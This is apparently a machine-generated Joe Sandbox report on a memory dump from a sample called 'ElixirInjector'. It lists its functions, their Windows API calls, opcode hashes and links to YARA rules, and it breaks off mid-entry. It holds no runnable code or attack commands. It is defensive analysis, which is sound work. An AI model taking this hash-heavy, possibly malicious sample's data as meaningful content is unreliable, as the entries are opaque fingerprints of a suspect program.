Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 5892f867bb64238b4eb7718a078691870df68bc03b71dc8d009337bc88a4c2c6
Instruction ID: e85e40f3264ec61bcfd4253ee4905143cbac544f85802f6625e64182f1ec8a8b
Opcode Fuzzy Hash: 5892f867bb64238b4eb7718a078691870df68bc03b71dc8d009337bc88a4c2c6
Instruction Fuzzy Hash: ACE068355402086BDB009F60DC41FDA376CAF0C3C5F080021BC04D2050EB35CEC4FA10

Function 00F2AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00F42641,000000FF), ref: 00F2ACB0
CoUninitialize.COMBASE(?,?,?,?,00F42641,000000FF), ref: 00F2ACB5

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: b69e08640cf2238efc67297969f60f4f233c1e6b0776bb6637c9ffbe8cacdb24
Instruction ID: a8fa0265511f167939b8cbe3806efa5ef5640ece71bf7951fcb9a137e2797124
Opcode Fuzzy Hash: b69e08640cf2238efc67297969f60f4f233c1e6b0776bb6637c9ffbe8cacdb24
Instruction Fuzzy Hash: C3E06572504654EFC700DB58DC06B45FBA8FB89B20F104265F416D3760CB74B941DA95

Function 00F1A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00F1A23A,?,00F1755C,?,?,?,?), ref: 00F1A254

Part of subcall function 00F1BB03: _wcslen.LIBCMT ref: 00F1BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00F1A23A,?,00F1755C,?,?,?,?), ref: 00F1A280

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 5ee0add0acaa21daa6130a3d0542bb99744deaf831c762e23ee76fd74c52be9c
Instruction ID: 38b2463872dfce0e9470bd8e029bae311f37b2ab5835e40788addbd14f06ee54
Opcode Fuzzy Hash: 5ee0add0acaa21daa6130a3d0542bb99744deaf831c762e23ee76fd74c52be9c
Instruction Fuzzy Hash: A9E092359001289BDB11EB68DC05BD977A8AB193E5F0442A1FD44E3190D771DE84EAA0

Function 00F2DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00F2DEEC

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

SetDlgItemTextW.USER32(00000065,?), ref: 00F2DF03

Part of subcall function 00F2B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F2B579
Part of subcall function 00F2B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B58A
Part of subcall function 00F2B568: IsDialogMessageW.USER32(000103D8,?), ref: 00F2B59E
Part of subcall function 00F2B568: TranslateMessage.USER32(?), ref: 00F2B5AC
Part of subcall function 00F2B568: DispatchMessageW.USER32(?), ref: 00F2B5B6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: e7f2e7f2d9fb87b39a9c90265bab6823f77dfabf0b8d659c0ac932fb2ce3e850
Instruction ID: a7641fe015ff322e2047b63c86cda798c8240372b1294c932fb7f05b1762a2b8
Opcode Fuzzy Hash: e7f2e7f2d9fb87b39a9c90265bab6823f77dfabf0b8d659c0ac932fb2ce3e850
Instruction Fuzzy Hash: ECE092B240035C26DF02AB61DC07FDE3B6C5B057C6F440851BB44EA0A2DA7CEA51AB61

Function 00F2081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F20836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F1F2D8,Crypt32.dll,00000000,00F1F35C,?,?,00F1F33E,?,?,?), ref: 00F20858

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: c96d8e4230e7baa473efde497d4404ba79d20b77f93da98a464611fb197d57ed
Instruction ID: 3443e7f64d8e848f9f351e97db01b6dfc269d2e9b445aef889c52ddd186f5da7
Opcode Fuzzy Hash: c96d8e4230e7baa473efde497d4404ba79d20b77f93da98a464611fb197d57ed
Instruction Fuzzy Hash: C4E0487780012C6BDB11A794EC45FDB7BACEF193D1F0400657A45E2004DA74DA84DBB0

Function 00F2A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F2A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F2A3E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 02bf859c0a1477d6d62f55fea0169f23e832d80f6461b5d045680497402810d8
Instruction ID: 8b277a418abee1e9bfed7ae35766bf7f8043f70be64e1faff6f0d7a5e033a8bd
Opcode Fuzzy Hash: 02bf859c0a1477d6d62f55fea0169f23e832d80f6461b5d045680497402810d8
Instruction Fuzzy Hash: 10E01271900228EFCB10DF55D94179DBBF8EF05364F20C05AE84697201E374AE44EB91

Function 00F32B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F32BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00F32BB5

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 29d5374bdd3c7cf0ce3b25a63aee3cb478be883ecf26125c8e67849c1c07c225
Instruction ID: d67463df12b40832ce70458afa33b80432af73a5558e9f55b550a5aa4f9a735b
Opcode Fuzzy Hash: 29d5374bdd3c7cf0ce3b25a63aee3cb478be883ecf26125c8e67849c1c07c225
Instruction Fuzzy Hash: 7BD02239954304185DD4AEB03C0394CB386FDD2BB1FA0538AF830854C1EE18C040B023

Function 00F112F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00F11306
ShowWindow.USER32(00000000), ref: 00F1130D

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 949193e574289b5c361da0e998b57a8543a3d5311d7d1e8204c1359960ac4727
Instruction ID: 96240ffe2183a7b724744109da055baa2919c5717a8ee7c561af0e578a65fee6
Opcode Fuzzy Hash: 949193e574289b5c361da0e998b57a8543a3d5311d7d1e8204c1359960ac4727
Instruction Fuzzy Hash: C1C0123285C228FECB010BB4DC09C2BBBAAABA5312F04C908B0A9C0060CA38C150FB12

Function 00F11A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F11A09

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c1f54bce3e027d038177047557cd0c777ae299f6aa22c0d33ca793d9dc16b6fc
Instruction ID: 3420c646ef75bb0abb8616aef54ac0f6b249ad936367c19d623c504fb40a6a69
Opcode Fuzzy Hash: c1f54bce3e027d038177047557cd0c777ae299f6aa22c0d33ca793d9dc16b6fc
Instruction Fuzzy Hash: BAC1C630E042549FEF15CF68C884BE97BA5BF56320F0801B9EE459B396DB3499C4EB61

Function 00F13BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F13BBF

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 95258c3916e79ed19a12951a9461284c7490908c394f9640cf220220e30f1385
Instruction ID: a80159fd824b0de33b6a34157b99852bb3b07d63b271a32a8552974d3047b296
Opcode Fuzzy Hash: 95258c3916e79ed19a12951a9461284c7490908c394f9640cf220220e30f1385
Instruction Fuzzy Hash: 0D71E371500B859EDB35DB70CC55AE7B7E9AF14301F40092EE6AB87242DA367AC8EF11

Function 00F18284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F18289

Part of subcall function 00F113DC: __EH_prolog.LIBCMT ref: 00F113E1

Part of subcall function 00F1A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F1A598

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 6c6cbd19bf71fcc3eafbe1ead3d3947786679733360e555896789ab3256602d7
Instruction ID: 915b9ababa1806258c4e35e66b7ec6189eaba4572fe13ecef4f299fcead51aa9
Opcode Fuzzy Hash: 6c6cbd19bf71fcc3eafbe1ead3d3947786679733360e555896789ab3256602d7
Instruction Fuzzy Hash: 9F41E871D446589ADB20DB60CD55BEAB778BF00340F0800EBE19A97083EF755EC5EB50

Function 00F113E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F113E1

Part of subcall function 00F15E37: __EH_prolog.LIBCMT ref: 00F15E3C

Part of subcall function 00F1CE40: __EH_prolog.LIBCMT ref: 00F1CE45

Part of subcall function 00F1B505: __EH_prolog.LIBCMT ref: 00F1B50A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d5786ef6797f96604dc7120260f11cd80298eec2de8144e05f4ab25d671c02bb
Instruction ID: 8088009d40f272d3b2d71feebb78f5d06268dc7b0b06389b3e0db42a795866cf
Opcode Fuzzy Hash: d5786ef6797f96604dc7120260f11cd80298eec2de8144e05f4ab25d671c02bb
Instruction Fuzzy Hash: CE414CB0905B40DEE724CF798885AE6FBE5BF19310F544A2ED5FE83282CB356654DB10

Function 00F113DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F113E1

Part of subcall function 00F15E37: __EH_prolog.LIBCMT ref: 00F15E3C

Part of subcall function 00F1CE40: __EH_prolog.LIBCMT ref: 00F1CE45

Part of subcall function 00F1B505: __EH_prolog.LIBCMT ref: 00F1B50A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2093091562efcda949cf5dab3bfe2d8da1df4ec168f5e071bef0c7b59f57f726
Instruction ID: 3f8d6383c1569d852461b1dfe9c86b84fc2ef0e0bc96aa3c3a69c7809ec59a8a
Opcode Fuzzy Hash: 2093091562efcda949cf5dab3bfe2d8da1df4ec168f5e071bef0c7b59f57f726
Instruction Fuzzy Hash: AF4159B0905B409EE724CF798885AE6FBE5BF29310F544A2ED5FE83282CB352654DB10

Function 00F2359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F235A3

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e95a57d5b8814e433774275204e1945d957e323c4d236e98451a4bdb8464d69d
Instruction ID: 21ca021af386c0c814c1e43a7a8ffcaeafd3b99228833a25fa24791ea2273634
Opcode Fuzzy Hash: e95a57d5b8814e433774275204e1945d957e323c4d236e98451a4bdb8464d69d
Instruction Fuzzy Hash: 872126F1E40221ABDB14DF74EC41A6B7A6CFB14324F14023AA506EB681D3789A00D6E8

Function 00F2B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F2B098

Part of subcall function 00F113DC: __EH_prolog.LIBCMT ref: 00F113E1

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 35000db4cbcfd03e49939d6b2d1ff6ae1f688d14221afbed7141dcd88a265544
Instruction ID: 2f8d740dedbe074e8f2db858fef1ef79bcc2a5b3cfb8437c476dd06fcb140e55
Opcode Fuzzy Hash: 35000db4cbcfd03e49939d6b2d1ff6ae1f688d14221afbed7141dcd88a265544
Instruction Fuzzy Hash: C9317C71C002599FCF15DFA4DC51AEEBBB4AF09310F1044AEE809B7242D739AE44EBA1

Function 00F3AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00F3ACF8

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 9400459738a24aa48e4e46e86c1294f51031205f9e17e240aed2a3e1abc006da
Instruction ID: 2309d5754b9b39779f3a3138de962a333dfbbc0d010aa996f53055dfb1b9b7ea
Opcode Fuzzy Hash: 9400459738a24aa48e4e46e86c1294f51031205f9e17e240aed2a3e1abc006da
Instruction Fuzzy Hash: 92110637B006295F9B229E2AEC4099A7395ABC5770F164220FCA5EB258D730DC01B7D2

Function 00F19215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F1921A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6047c07e234257c0fc95fa22919e926a7441dc6c0bb388ccc250d77963997be2
Instruction ID: 17a13fe41d26a619c5e01c5b5168d8357a8add09fcf7d00a2d442051a14f91f8
Opcode Fuzzy Hash: 6047c07e234257c0fc95fa22919e926a7441dc6c0bb388ccc250d77963997be2
Instruction Fuzzy Hash: 6401A933D00564ABCF11AF68CC519DEB735BF88750F014115F815B7112DA788D41E6E0

Function 00F33C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00F33C3F

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 2816516d4b8ec17eef70722cda9d5ac0156c7a9ebea005b744fcf177788dbc9d
Instruction ID: 8553774ff13a566cdd5b1e817bb064bbfc47e45d0cb351d6a41b591f94a6c304
Opcode Fuzzy Hash: 2816516d4b8ec17eef70722cda9d5ac0156c7a9ebea005b744fcf177788dbc9d
Instruction Fuzzy Hash: DBF0EC366002169FDF12DE69EC0099A77D9EF41BB4B105124FE05E7190DB31DA20F790

Function 00F38E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00F34286,?,0000015D,?,?,?,?,00F35762,000000FF,00000000,?,?), ref: 00F38E38

Memory Dump Source

